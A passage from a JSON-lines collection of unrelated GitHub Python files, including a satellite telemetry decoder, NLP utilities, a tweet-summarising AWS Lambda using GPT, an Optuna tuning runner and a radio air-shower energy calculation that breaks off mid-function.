__init__(self, minThreshold, maxLength, cutOffThreshold, filter):\n self.minThreshold = minThreshold\n self.maxLength = maxLength\n self.cutOffThreshold = cutOffThreshold\n self.filter = filter\n\n def reset(self):\n self.filter.reset()\n\n def add(self, value):\n valueLength = value.length\n valueToAdd = Vector3(value)\n if valueLength < self.minThreshold or valueLength >= self.cutOffThreshold:\n valueToAdd *= 0.0\n if valueLength > self.maxLength:\n valueToAdd *= self.maxLength / valueLength\n return self.filter.add(valueToAdd)\n# okay decompyling res/scripts/client/avatarinputhandler/mathutils.pyc \n# decompiled 1 files: 1 okay, 0 failed, 0 verify failed\n# 2013.11.15 11:25:27 EST\n","repo_name":"Omegaice/WOTDecompiled","sub_path":"res/scripts/client/avatarinputhandler/mathutils.py","file_name":"mathutils.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"40034830801","text":"#!/usr/bin/env python\nfrom datetime import datetime, timedelta\n\nEPOCH_DATE = datetime.strptime('20000101T000000Z', '%Y%m%dT%H%M%SZ')\n\n\ndef decode_payload(payload, observation_datetime, data_id):\n dt = payload[:32]\n datasets = payload[32:]\n\n # calculate initial datetime\n seconds = int(dt[24:] + dt[16:24] + dt[8:16] + dt[:8], 2)\n\n telemetry = []\n\n while datasets:\n 
dataset = datasets[:57]\n datasets = datasets[57:]\n\n dataset_datetime = EPOCH_DATE + timedelta(seconds=seconds)\n seconds += 60\n satellite_datetime = datetime.strftime(dataset_datetime, '%Y%m%dT%H%M%SZ')\n\n # mode\n status = dataset[0]\n\n # battery voltage\n u = float(int(dataset[1:9], 2))\n bat_v = round((u + 60) / 20, 2)\n\n # battery current\n u = float(int(dataset[9:17], 2))\n bat_c = round((u - 127) / 127, 2)\n\n # 3v3 current\n u = float(int(dataset[17:25], 2))\n v3_c = round(u / 40, 2)\n\n # 5v current\n u = float(int(dataset[25:33], 2))\n v5_c = round(u / 40, 2)\n\n # temperature comms\n u = float(int(dataset[33:41], 2))\n comms_t = round((u - 60) / 4, 2)\n\n # temperature eps\n u = float(int(dataset[41:49], 2))\n eps_t = round((u - 60) / 4, 2)\n\n # temperature battery\n u = float(int(dataset[49:], 2))\n batt_t = round((u - 60) / 4, 2)\n\n data = {\n 'satellite_datetime': satellite_datetime,\n 'observation_datetime': observation_datetime,\n 'data_id': data_id,\n 'demod_data': {\n 'status': status,\n 'bat_v': bat_v,\n 'bat_c': bat_c,\n 'v3_c': v3_c,\n 'v5_c': v5_c,\n 'comms_t': comms_t,\n 'eps_t': eps_t,\n 'batt_t': batt_t\n }\n }\n\n telemetry.append(data)\n return telemetry\n","repo_name":"elkos/satnogs-db","sub_path":"db/base/decoders/qb50.py","file_name":"qb50.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"27579089698","text":"import numpy as np\nimport csv\nimport os.path\n\n# This script caculates one feature: same_journal\n# For a pair of papers this feature is equal one if and only if the two papers werde published in the same journal and\n# is equal zero if and only if the two papers were not published in the same journal.\n\n\n# checks whether papers were published in the same journal for training and testing set\ndef same_journal(info, index_train, index_test):\n\n # check whether papers were published in the same journal for training_set\n if not os.path.isfile(\"./data/same_journal_training.txt\"):\n\n print(\"Same journal is now calculated for the training data.\")\n\n with open(\"./data/same_journal_training.txt\", 'w') as file:\n for i in range(0, len(index_train)):\n file.write(str(int(info[index_train[i][0]][4].lower() == info[index_train[i][1]][4].lower())) + \"\\n\")\n\n # check whether papers were published in the same journal for testing_set\n if not os.path.isfile(\"./data/same_journal_testing.txt\"):\n\n print(\"Same journal is now calculated for the testing data.\")\n\n with open(\"./data/same_journal_testing.txt\", 'w') as file:\n for i in range(0, len(index_test)):\n file.write(str(int(info[index_test[i][0]][4].lower() == info[index_test[i][1]][4].lower())) + \"\\n\")\n\n","repo_name":"fabrizio-indirli/citationsPrediction","sub_path":"scripts/same_journal.py","file_name":"same_journal.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41417496251","text":"import argparse\nimport logging\nfrom qmath import Quaternion\nimport nn # Import your neural network module here\n\nclass QuaternionOperationDemonstrator:\n def __init__(self, q1, q2):\n self.q1 = q1\n self.q2 = q2\n\n def display_basic_operations(self):\n \"\"\"Display basic quaternion operations.\"\"\"\n print(f\"q1: {self.q1}\")\n print(f\"q2: {self.q2}\")\n print(f\"q1 * q2: {self.q1 * self.q2}\")\n print(f\"q1 + q2: {self.q1 + self.q2}\")\n\n def display_angle_axis_representation(self, q):\n 
\"\"\"Display angle-axis representation of a quaternion.\"\"\"\n angle, axis = q.to_angle_axis()\n print(f\"Angle-axis representation of {q}: Angle = {angle}, Axis = {axis}\")\n\ndef demonstrate_quaternion_operations():\n \"\"\"Demonstrate quaternion operations.\"\"\"\n q1 = Quaternion(1, 2, 3, 4)\n q2 = Quaternion(2, 3, 4, 5)\n\n demo = QuaternionOperationDemonstrator(q1, q2)\n demo.display_basic_operations()\n demo.display_angle_axis_representation(q1)\n # Add more demonstrations as needed.\n\ndef train_rl_model(logging_level):\n \"\"\"Train an RL model using Quaternion Neural Network.\"\"\"\n # Configure logging\n logging.basicConfig(level=logging_level, format=\"%(asctime)s - %(levelname)s - %(message)s\")\n\n try:\n nn.train_dqn()\n except Exception as e:\n logging.error(f\"An error occurred during training: {e}\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Quaternion Operations and RL Training\")\n parser.add_argument(\"--log-level\", choices=[\"INFO\", \"DEBUG\"], default=\"INFO\",\n help=\"Logging level (INFO or DEBUG)\")\n args = parser.parse_args()\n\n # Set the logging level\n log_level = getattr(logging, args.log_level)\n \n print(\"Demonstrating Quaternion Operations:\")\n demonstrate_quaternion_operations()\n \n print(\"\\nTraining RL Model using Quaternion Neural Network:\")\n train_rl_model(log_level)\n","repo_name":"xStFtx/Aggregate","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71479302647","text":"#!/usr/bin/env python3\n\nimport sys\nfrom datetime import datetime\nfrom statistics import mean, median, stdev\n\n# Check for adequate number of args\nif (len(sys.argv)) <= 1:\n print(\"USAGE: python3 read_time_stats.py inputData\")\n sys.exit()\n\n# Populate a dictionary with the sources and their corresponding bias\nsources = open(\"../csv/sources_histogram.csv\",\"r\")\nsources_bias = {}\nfor line in sources:\n current = line.split(',')\n current_source = current[3].rstrip()\n current_bias = float(current[1])\n sources_bias[current_source] = current_bias\n\nvisited_pages = {}\n# Open user data\ndata = open(sys.argv[1],\"r\")\nfor line in data:\n current = line.split(',')\n time_stamp = current[0]\n type = current[1]\n url = current[2].rstrip()\n\n # Check for entering an article\n if type == \"entering_news_tab\":\n if url not in visited_pages:\n visited_pages[url] = (0, datetime.strptime(time_stamp, '%Y/%m/%d %H:%M:%S'))\n else:\n visited_pages[url] = (visited_pages[url][0], datetime.strptime(time_stamp, '%Y/%m/%d %H:%M:%S'))\n\n # Check for leaving an article\n if type == \"closed_news_site\" or type == 'leaving_news_tab':\n if url in visited_pages:\n if visited_pages[url][1] is not None:\n visited_pages[url] = (visited_pages[url][0] + (datetime.strptime(time_stamp, '%Y/%m/%d %H:%M:%S') - visited_pages[url][1]).total_seconds(), None)\n\nmin = float('inf')\nmax = float('-inf')\n\nx = []\n# Get stats from all the pages read\nfor key, value in visited_pages.items():\n time_spent = int(value[0])\n if time_spent < min:\n min = time_spent\n if time_spent > max:\n max = time_spent\n x.append(time_spent)\n\nprint('mean time: {}'.format(mean(x)))\nprint('minimum time: {}'.format(min))\nprint('median time: {}'.format(median(x)))\nprint('maximum time: {}'.format(max))\nprint('stdev time: 
{}'.format(stdev(x)))\n","repo_name":"yugowatanabe/counterweight","sub_path":"data_analysis_scripts/read_time_stats.py","file_name":"read_time_stats.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10189590080","text":"from selenium import webdriver\nimport visualisation\n\n\ndef test_header(dash_duo):\n dash_duo.start_server(visualisation)\n dash_duo.wait_for_text_to_equal(\".h1\", \"Pink Morsel Sales\", timeout=None)\n assert dash_duo.find_element(\".h1\").text == \"Pink Morsel Sales\"\n\n\ndef test_visualisation(dash_duo):\n dash_duo.start_server(visualisation)\n dash_duo.wait_for_text_to_equal(\"indicator-graphic\", timeout=None)\n assert dash_duo.wait_for_element_by_id(\"indicator-graphic\", timeout=None)\n\n\ndef test_region_picker(dash_duo):\n dash_duo.start_server(visualisation)\n dash_duo.wait_for_text_to_equal(\"region\", timeout=None)\n assert dash_duo.wait_for_element_by_id(\"region\", timeout=None)\n\n\nif __name__ == '__main__':\n driver = webdriver.Chrome()\n driver.get('http://127.0.0.1:8050/')\n","repo_name":"ShenyiHu/quantium-starter-repo","sub_path":"test_visualistaion.py","file_name":"test_visualistaion.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"3351836177","text":"\"\"\"\nUtility functions.\n\"\"\"\nimport io\nimport os\nimport zipfile\nfrom collections import Counter\n\nimport numpy as np\nimport requests\n\ndef load_data_and_labels(filename):\n \"\"\"Loads data and label from a file.\n Args:\n filename (str): path to the file.\n The file format is tab-separated values.\n A blank line is required at the end of a sentence.\n For example:\n ```\n EU\tB-ORG\n rejects\tO\n German\tB-MISC\n call\tO\n to\tO\n boycott\tO\n British\tB-MISC\n lamb\tO\n .\tO\n Peter\tB-PER\n Blackburn\tI-PER\n ...\n ```\n Returns:\n tuple(numpy array, numpy array): data and labels.\n Example:\n >>> filename = 'medical/train.eval'\n >>> data, labels = load_data_and_labels(filename)\n \"\"\"\n sents, labels = [], []\n words, tags = [], []\n with open(filename) as f:\n for line in f:\n line = line.rstrip()\n if line:\n word, tag = line.split(' ')\n words.append(word)\n tags.append(tag)\n else:\n sents.append(words)\n labels.append(tags)\n words, tags = [], []\n\n return sents, labels\n\ndef load_data(filename):\n \"\"\"Loads data from a file.\n Args:\n filename (str): path to the file.\n A blank line is required at the end of a sentence.\n Returns:\n numpy array: data\n Example:\n >>> filename = 'medical/test.eval'\n >>> data = load_data(filename)\n \"\"\"\n sents = []\n words = []\n with open(filename) as f:\n for line in f:\n line = line.rstrip()\n if line:\n word = line\n words.append(word)\n else:\n sents.append(words)\n words = []\n\n return sents\n\ndef save_prediction(filename, words, tags):\n \"\"\"Saves prediction result to a file.\n Args:\n filename (str): path to the file.\n A blank line is required at the end of a sentence.\n Returns:\n numpy array: data\n Example:\n >>> filename = 'medical/test_prediction.eval'\n >>> data = save_prediction(filename)\n \"\"\"\n with open(filename, 'a+') as f:\n for i in range(len(words)):\n f.write(words[i] + ' ' + tags[i] + '\\n')\n f.write('\\n')\n f.close()\n\ndef batch_iter(data, labels, batch_size=1, shuffle=True, preprocessor=None):\n num_batches_per_epoch = int((len(data) - 1) / batch_size) + 1\n\n def data_generator():\n \"\"\"\n Generates 
a batch iterator for a dataset.\n \"\"\"\n data_size = len(data)\n while True:\n indices = np.arange(data_size)\n # Shuffle the data at each epoch\n if shuffle:\n indices = np.random.permutation(indices)\n\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n X = [data[i] for i in indices[start_index: end_index]]\n y = [labels[i] for i in indices[start_index: end_index]]\n yield preprocessor.transform(X, y)\n\n return num_batches_per_epoch, data_generator()\n\nclass Vocabulary(object):\n \"\"\"A vocabulary that maps tokens to ints (storing a vocabulary).\n Attributes:\n _token_count: A collections.Counter object holding the frequencies of tokens\n in the data used to build the Vocabulary.\n _token2id: A collections.defaultdict instance mapping token strings to\n numerical identifiers.\n _id2token: A list of token strings indexed by their numerical identifiers.\n \"\"\"\n\n def __init__(self, max_size=None, lower=True, unk_token=True, specials=('',)):\n \"\"\"Create a Vocabulary object.\n Args:\n max_size: The maximum size of the vocabulary, or None for no\n maximum. Default: None.\n lower: boolean. Whether to convert the texts to lowercase.\n unk_token: boolean. Whether to add unknown token.\n specials: The list of special tokens (e.g., padding or eos) that\n will be prepended to the vocabulary. Default: ('',)\n \"\"\"\n self._max_size = max_size\n self._lower = lower\n self._unk = unk_token\n self._token2id = {token: i for i, token in enumerate(specials)}\n self._id2token = list(specials)\n self._token_count = Counter()\n\n def __len__(self):\n return len(self._token2id)\n\n def add_token(self, token):\n \"\"\"Add token to vocabulary.\n Args:\n token (str): token to add.\n \"\"\"\n token = self.process_token(token)\n self._token_count.update([token])\n\n def add_documents(self, docs):\n \"\"\"Update dictionary from a collection of documents. 
Each document is a list\n of tokens.\n Args:\n docs (list): documents to add.\n \"\"\"\n for sent in docs:\n sent = map(self.process_token, sent)\n self._token_count.update(sent)\n\n def doc2id(self, doc):\n \"\"\"Get the list of token_id given doc.\n Args:\n doc (list): document.\n Returns:\n list: int id of doc.\n \"\"\"\n doc = map(self.process_token, doc)\n return [self.token_to_id(token) for token in doc]\n\n def id2doc(self, ids):\n \"\"\"Get the token list.\n Args:\n ids (list): token ids.\n Returns:\n list: token list.\n \"\"\"\n return [self.id_to_token(idx) for idx in ids]\n\n def build(self):\n \"\"\"\n Build vocabulary.\n \"\"\"\n token_freq = self._token_count.most_common(self._max_size)\n idx = len(self.vocab)\n for token, _ in token_freq:\n self._token2id[token] = idx\n self._id2token.append(token)\n idx += 1\n if self._unk:\n unk = ''\n self._token2id[unk] = idx\n self._id2token.append(unk)\n\n def process_token(self, token):\n \"\"\"Process token before following methods:\n * add_token\n * add_documents\n * doc2id\n * token_to_id\n Args:\n token (str): token to process.\n Returns:\n str: processed token string.\n \"\"\"\n if self._lower:\n token = token.lower()\n\n return token\n\n def token_to_id(self, token):\n \"\"\"Get the token_id of given token.\n Args:\n token (str): token from vocabulary.\n Returns:\n int: int id of token.\n \"\"\"\n token = self.process_token(token)\n return self._token2id.get(token, len(self._token2id) - 1)\n\n def id_to_token(self, idx):\n \"\"\"token-id to token (string).\n Args:\n idx (int): token id.\n Returns:\n str: string of given token id.\n \"\"\"\n return self._id2token[idx]\n\n @property\n def vocab(self):\n \"\"\"Return the vocabulary.\n Returns:\n dict: get the dict object of the vocabulary.\n \"\"\"\n return self._token2id\n\n @property\n def reverse_vocab(self):\n \"\"\"Return the vocabulary as a reversed dict object.\n Returns:\n dict: reversed vocabulary object.\n \"\"\"\n return self._id2token\n\n\ndef filter_embeddings(embeddings, vocab, dim):\n \"\"\"Loads word vectors in numpy array.\n Args:\n embeddings (dict): a dictionary of numpy array.\n vocab (dict): word_index lookup table.\n Returns:\n numpy array: an array of word embeddings.\n \"\"\"\n if not isinstance(embeddings, dict):\n return\n _embeddings = np.zeros([len(vocab), dim])\n for word in vocab:\n if word in embeddings:\n word_idx = vocab[word]\n _embeddings[word_idx] = embeddings[word]\n\n return _embeddings\n\ndef load_glove(file):\n \"\"\"Loads GloVe vectors in numpy array.\n Args:\n file (str): a path to a glove file.\n Return:\n dict: a dict of numpy arrays.\n \"\"\"\n model = {}\n with open(file) as f:\n for line in f:\n line = line.split(' ')\n word = line[0]\n vector = np.array([float(val) for val in line[1:]])\n model[word] = vector\n\n return model","repo_name":"LordLiang/NER","sub_path":"bilstm_crf/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8327,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"4207083950","text":"# Dada uma string codificada, retorne a string decodificada.\n# s = \"2[a]3[bc]\", retornará \"aabcbcbc\".\n# s = \"3[a2[c]]\", retornará \"accaccacc\".\n# s = \"2[abc]3[cd]ef\", retornará \"abcabccdcdcdef\".\n\n# 2[a] 3[bc]\n# arrStrings = [\"2[a]3[bc]\", \"3[a2[c]]\", \"2[abc]3[cd]ef\"]\n\n# for nr_pos_string, ds_str_atual in enumerate(ds_string):\narrStrings = [\n \"2[a]3[bc]\",\n \"2[abc]3[cd]ef\",\n \"3[a2[c]]\"\n]\n\nclass Decodifica:\n def 
__init__(self):\n self.arrPilha = []\n\n def decodificar(self, ds_texto):\n for ds_char in ds_texto:\n self.arrPilha.append(ds_char)\n if ds_char == \"]\":\n self.processaFechamento()\n return self.imprimirPilha()\n \n def processaFechamento(self):\n # remove fechamento\n self.arrPilha.pop()\n\n ds_texto_final = \"\"\n ds_char = self.arrPilha.pop()\n while (ds_char != \"[\"):\n ds_texto_final = ds_char + ds_texto_final\n ds_char = self.arrPilha.pop()\n\n nr_repetidor = int(self.arrPilha.pop())\n ds_texto_final = ds_texto_final * nr_repetidor\n\n self.arrPilha.append(ds_texto_final)\n \n def imprimirPilha(self):\n ds_texto = \"\"\n while self.arrPilha:\n ds_texto = self.arrPilha.pop() + ds_texto\n return ds_texto\n\nfor ds_texto in arrStrings:\n objDecodifica = Decodifica()\n print(objDecodifica.decodificar(ds_texto)) \n","repo_name":"adrwtr/algomania","sub_path":"decode-string.py","file_name":"decode-string.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13702130213","text":"from twython import Twython\nimport os\nimport openai\nfrom dateutil import parser\nfrom datetime import datetime\nimport logging\nimport json\nimport pytz\nfrom typing import Optional\nimport re\nimport boto3\nimport pandas as pd\nimport psycopg2\nimport psycopg2.extras\nfrom botocore.exceptions import ClientError\n\nopenai.api_key = os.environ['OPENAI_API_KEY']\n\ndef get_db_connection() -> psycopg2.extensions.connection:\n # to connect to DB, use the parameters and password that define it\n conn = psycopg2.connect(\n user=\"postgres\",\n password=os.environ['DB_PASSWORD'], #password\n host=os.environ['DB_HOST'], #twitter.cblavhksmkyd.eu-central-1.rds.amazonaws.com\n port=\"5432\",\n connect_timeout=1)\n return conn\n\ndef _time_parser(twitter_time: str) -> datetime:\n '''\n Parse string from twitter api like 'Sat Sep 02 14:25:02 +0000 2021'\n to a datetime object in utc time\n '''\n return parser.parse(twitter_time)\n\n\ndef is_recent(tweet: dict,\n max_time_interval_minutes: int = 20) -> bool:\n '''\n a tweet is recent if it is posted in the last x minutes'\n '''\n time_created = _time_parser(tweet['created_at'])\n now = datetime.now(tz=pytz.UTC)\n # converts time to minutes as the function takes minutes as argument\n seconds_diff = (now-time_created).seconds\n minutes_diff = seconds_diff/60\n is_recent_tweet = minutes_diff <= max_time_interval_minutes\n return is_recent_tweet\n\n\ndef extract_fields(tweet: dict) -> dict:\n '''\n Arbitrary decision to save only some fields of the tweet,\n store them in a different dictionary form which\n is convenient for saving them later\n '''\n author = tweet['user']['screen_name']\n time_created = _time_parser(tweet['created_at'])\n text = tweet['text']\n return dict(author=author,timestamp=time_created, text=text)\n\n\ndef upload_file_to_s3(local_file_name: str,\n bucket: str,\n s3_object_name: Optional[str]=None):\n \"\"\"Upload a file to an S3 bucket\n\n :param file_name: File to upload\n :param bucket: Bucket to upload to\n :param s3_object_name: If not specified then file_name is used\n :return: True if file was uploaded, else False\n \"\"\"\n\n # If S3 object_name was not specified, use file_name\n if s3_object_name is None:\n s3_object_name = local_file_name\n\n # Upload the file\n s3_client = boto3.client(\n 's3',\n aws_access_key_id=os.environ['IAM_AWS_ACCESS_KEY'],\n aws_secret_access_key=os.environ['IAM_AWS_SECRET_ACCESS_KEY'],\n )\n try:\n 
s3_client.upload_file(local_file_name, bucket, s3_object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True\n\ndef convert_timestamp_to_int(tweet: dict) ->dict:\n '''datetime object are not serializable for json,\n so we need to convert them to unix timestamp'''\n tweet = tweet.copy()\n tweet['timestamp'] = tweet['timestamp'].timestamp()\n return tweet\n\n\ndef insert_data_in_db(df: pd.DataFrame,\n conn: psycopg2.extensions.connection,\n table_name: str = 'tweets_analytics') -> None:\n # you need data and a valid connection to insert data in DB\n are_data = len(df) > 0\n if are_data and conn is not None:\n try:\n cur = conn.cursor()\n # For a batch insert we need to reshape the data \n # in 2 strings with the column names and their values\n df_columns = list(df.columns)\n columns = \",\".join(df_columns)\n\n # create VALUES('%s', '%s\",...) one '%s' per column\n values = \"VALUES({})\".format(\",\".join([\"%s\" for _ in df_columns]))\n\n # create INSERT INTO table (columns) VALUES('%s',...)\n # here the final 2 strings are created\n insert_string = \"INSERT INTO {} ({}) {}\"\n insert_stmt = insert_string.format(table_name, columns, values)\n psycopg2.extras.execute_batch(cur, insert_stmt, df.values)\n conn.commit()\n print('succesful update')\n\n except psycopg2.errors.InFailedSqlTransaction:\n # if the transaction fails, rollback to avoid DB lock problems\n logging.exception('FAILED transaction')\n cur.execute(\"ROLLBACK\")\n conn.commit()\n\n except Exception as e:\n # if the transaction fails, rollback to avoid DB lock problems\n logging.exception(f'FAILED {str(e)}')\n cur.execute(\"ROLLBACK\")\n conn.commit()\n finally:\n # close the DB connection after this\n cur.close()\n conn.close()\n elif conn is None:\n raise ValueError('Connection to DB must be alive!')\n elif len(df) == 0:\n raise ValueError('df has 0 rows!')\n\ndef ask_gpt(context, question, tweet, MODEL):\n response = openai.ChatCompletion.create(\n model=MODEL,\n messages=[\n {\"role\": \"system\", \"content\": f\"{context}\"},\n {\"role\": \"user\", \"content\": f'{question}\\n\\Tweet:\\n\"\"\"\\n{tweet}'},\n ],\n temperature=0.5,\n )\n return response\n\n\ndef lambda_handler(event, context):\n try:\n python_tweets = Twython(os.environ['TWITTER_API_KEY'],\n os.environ['TWITTER_API_SECRET'])\n persons = ['LavinJoaquin', 'gabrielboric', 'rodolfocarter', 'joseantoniokast', 'AXELKAISER', 'PamJiles'\n 'Orrego', 'carreragonzalo', 'Diego_Schalper' ,'GiorgioJackson', 'izkia'\n , 'Carolina_Toha', 'guidogirardi', 'Jou_Kaiser', 'MaiteOrsini', 'GmoRamirez', 'gonzalowinter']\n clean_timeline = []\n for p in persons:\n query = {'screen_name': p}\n tweets = python_tweets.get_user_timeline(**query)\n recent_tweets = [tweet for tweet in tweets\n if is_recent(tweet)] \n for tweet in recent_tweets:\n # Ignorar los retweets\n if 'retweeted_status' not in tweet:\n # Ignorar los tweets con enlaces\n if 'http' in tweet['text']:\n tweet['text'] = re.sub(r\"http\\S+\", \"\", tweet['text'])\n else:\n continue\n clean_timeline.append(tweet)\n \n clean_timeline = [extract_fields(tweet) for tweet in clean_timeline]\n context_gpt = {}\n question = {}\n question['summary'] = 'Me puedes decir cual es el tema central del siguiente tweet? responde en no mas de 3 palabras'\n question['intention'] = 'Crees que el siguiente tweet tiene una intención constructiva, destructiva o neutral? 
Tu respuesta debe ser una sola palabra'\n context_gpt['summary'] = 'Imagina que eres un experto en descubrir palabras clave y resumiendo contenido'\n context_gpt['intention'] = 'Imagina que eres un experto en politica y opinologia'\n \n MODEL = \"gpt-3.5-turbo\"\n columns = ['summary', 'intention']\n \n for tw in range(len(clean_timeline)):\n for col in columns:\n response = ask_gpt(context_gpt[col], question[col], clean_timeline[tw]['text'], MODEL)\n clean_timeline[tw][f'gpt_{col}'] = response['choices'][0]['message']['content']\n now_str = datetime.now(tz=pytz.UTC).strftime('%d-%m-%Y-%H:%M:%S')\n filename = f'{now_str}.json'\n output_path_file = f'/tmp/{filename}'\n # in lambda files need to be dumped into /tmp folder\n with open(output_path_file, 'w') as fout:\n tweets_to_save = [convert_timestamp_to_int(tweet)\n for tweet in clean_timeline]\n json.dump(tweets_to_save , fout)\n upload_file_to_s3(local_file_name=output_path_file,\n bucket=os.environ['TWITTER_BUCKET'],\n s3_object_name=f'raw-messages/{filename}')\n \n tweets_df = pd.DataFrame(clean_timeline)\n conn = get_db_connection()\n insert_data_in_db(df=tweets_df, conn=conn, table_name='tweets_analytics')\n except Exception as e:\n logging.exception('Exception occured \\n') \n print('Lambda executed succesfully!')\n\nif __name__ == \"__main__\":\n lambda_handler({}, {})","repo_name":"jtlavin/twitter-gpt","sub_path":"tweet_gpt_analytics/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":8288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"26451751045","text":"import argparse\nimport time\n\nimport optuna\n\nfrom batbench.manager.manager import Manager\nfrom batbench.result.result import Result\n\nclass Optuna:\n\n def objective(self, trial):\n tuning_config = self.get_next_tuning_config(trial)\n self.result.config = tuning_config\n\n self.result.algorithm_time = time.time() - self.t0\n prev_result = self.manager.run(tuning_config, self.result)\n self.result = Result()\n return prev_result.objective\n\n def get_next_tuning_config(self, trial):\n tuning_config = {}\n for (name, values) in self.manager.config_space.get_parameters_pair():\n tuning_config[name] = trial.suggest_categorical(name, values)\n\n return tuning_config\n\n def main(self, args):\n self.manager = Manager(args)\n n_trials = self.manager.budget_trials\n #if self.manager.problem.spec[\"General\"][\"LoggingLevel\"] != \"Debug\":\n optuna.logging.set_verbosity(optuna.logging.WARNING)\n\n search_space = {}\n for (name, values) in self.manager.config_space.get_parameters_pair():\n search_space[name] = values\n\n study = optuna.create_study(sampler=optuna.samplers.GridSampler(search_space))\n self.t0 = time.time()\n self.result = Result()\n study.optimize(self.objective, n_trials=n_trials)\n self.manager.dataset.final_write_data()\n best = self.manager.dataset.get_best()\n self.manager.finished()\n return best\n\n\ndef main():\n\n optunaparser = argparse.ArgumentParser()\n optunaparser.add_argument('--json', type=str, default=\"./benchmarks/MD5Hash-CAFF.json\",\n help='location of T1 json file')\n optunaparser.add_argument('--testing', type=str, default=False,\n help='If the execution is a test or not')\n\n args = optunaparser.parse_args()\n\n\n optuna_runner = Optuna()\n\n\n if not args.verbose:\n optuna.logging.set_verbosity(optuna.logging.WARNING)\n\n print(optuna_runner.main(args))\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"NTNU-HPC-Lab/BAT","sub_path":"batbench/tuners/optuna_runner/optuna_runner.py","file_name":"optuna_runner.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"14604555413","text":"from keras import backend as K\n\ndef set_trainable(model, train):\n \"\"\"\n Enable or disable training for the model\n args:\n model(?):\n train(?):\n \"\"\"\n model.trainable = train\n for l in model.layers:\n l.trainable = train\n\n\ndef zero_loss(y_true, y_pred):\n \"\"\"\n args:\n y_true():\n y_pred():\n \"\"\"\n return K.zeros_like(y_true)\n\ndef sample_normal(args):\n \"\"\"\n\n \"\"\"\n z_avg, z_log_var = args\n batch_size = K.shape(z_avg)[0]\n z_dims = K.shape(z_avg)[1]\n eps = K.random_normal(shape=(batch_size, z_dims), mean=0.0, stddev=1.0)\n return z_avg + K.exp(z_log_var / 2.0) * eps\n\ndef time_format(t):\n m, s = divmod(t, 60)\n m = int(m)\n s = int(s)\n if m == 0:\n return \"%d sec\" %s\n else:\n return \"%d min %d sex\" %(m, s)\n\n","repo_name":"tkazusa/CVAE-GAN","sub_path":"models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"76"} +{"seq_id":"7931060837","text":"import numpy as np\n#import matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\n\n\n#atmc = atm.Atmosphere(model=1)\naverage_density = 6.5e-4 #in g/cm^3#atmc.get_density(average_zenith, average_xmax) * 1e-3 # in kg/m^3\nmag=2.03\n\n\nrho_avg=0.72 # average density, 0.72 kg/m3\n# charge excess parameters\np0a=0.2\np1a=1.27\np2a=-0.08\n\n# slant depth parameters proton\np0s_p=1.02\np1s_p=-0.49\np2s_p=0\n\n# slant depth parameters iron\np0s_fe=0.98\np1s_fe=-0.47\np2s_fe=0\n\n\ndef integral(fluence,pos):\n\n pos_uvw_vxb=pos[0::8]\n pos_uvw_vxvxb=pos[2::8]\n neg_uvw_vxb=pos[4::8]\n neg_uvw_vxvxb=pos[6::8]\n \n fluence_pos_vxb=fluence[0::8]\n fluence_pos_vxvxb=fluence[2::8]\n fluence_neg_vxb=fluence[4::8]\n fluence_neg_vxvxb=fluence[6::8]\n \n \n \n pos_vxvxb_all=np.concatenate([neg_uvw_vxvxb.T[1],pos_uvw_vxvxb.T[1]])\n fluence_vxvxb=np.concatenate([fluence_pos_vxvxb,fluence_neg_vxvxb])\n inds = pos_vxvxb_all.argsort()\n \n sorted_pos=pos_vxvxb_all[inds]\n sorted_fluence_vxvxb=fluence_vxvxb[inds]\n f0 = interp1d(sorted_pos, sorted_fluence_vxvxb, kind='cubic')\n r= np.linspace(0, 500, num=1000, endpoint=True)\n \n \n # integrate positive vxvxB arm\n n=len(r)\n dr=r[1]-r[0]\n integral=0\n \n for i in np.arange(n-1):\n r0=r[i]\n r1=r[i+1]\n val0=r0*(f0(r0))\n val1=r1*(f0(r1))\n integral=integral+(val0+val1)*0.5*dr\n\n integral=integral*2*np.pi\n\n\n return integral\n\n\ndef StoEm(S,A=1.683,B=2.006):\n \n Em=np.power((S/(A*1e7)),1/B)*1e18\n\n return Em\n\n\n\ndef return_Srd(Erad,zenith,density,alpha,type):\n a=return_a(density*1e3*np.cos(zenith),rho_avg,p0a,p1a,p2a)/mag**0.9\n Srd=Erad/np.sin(alpha)**2/mag**1.8\n Srd_1=Erad/(a**2+(1-a**2)*np.sin(alpha)**2)/mag**1.8\n if type==0:\n Srd_2=Erad/(a**2+(1-a**2)*np.sin(alpha)**2)/(1-p0s_p+p0s_p*np.exp(p1s_p*(density*1e3*np.cos(zenith)-rho_avg)))**2/mag**1.8\n else:\n 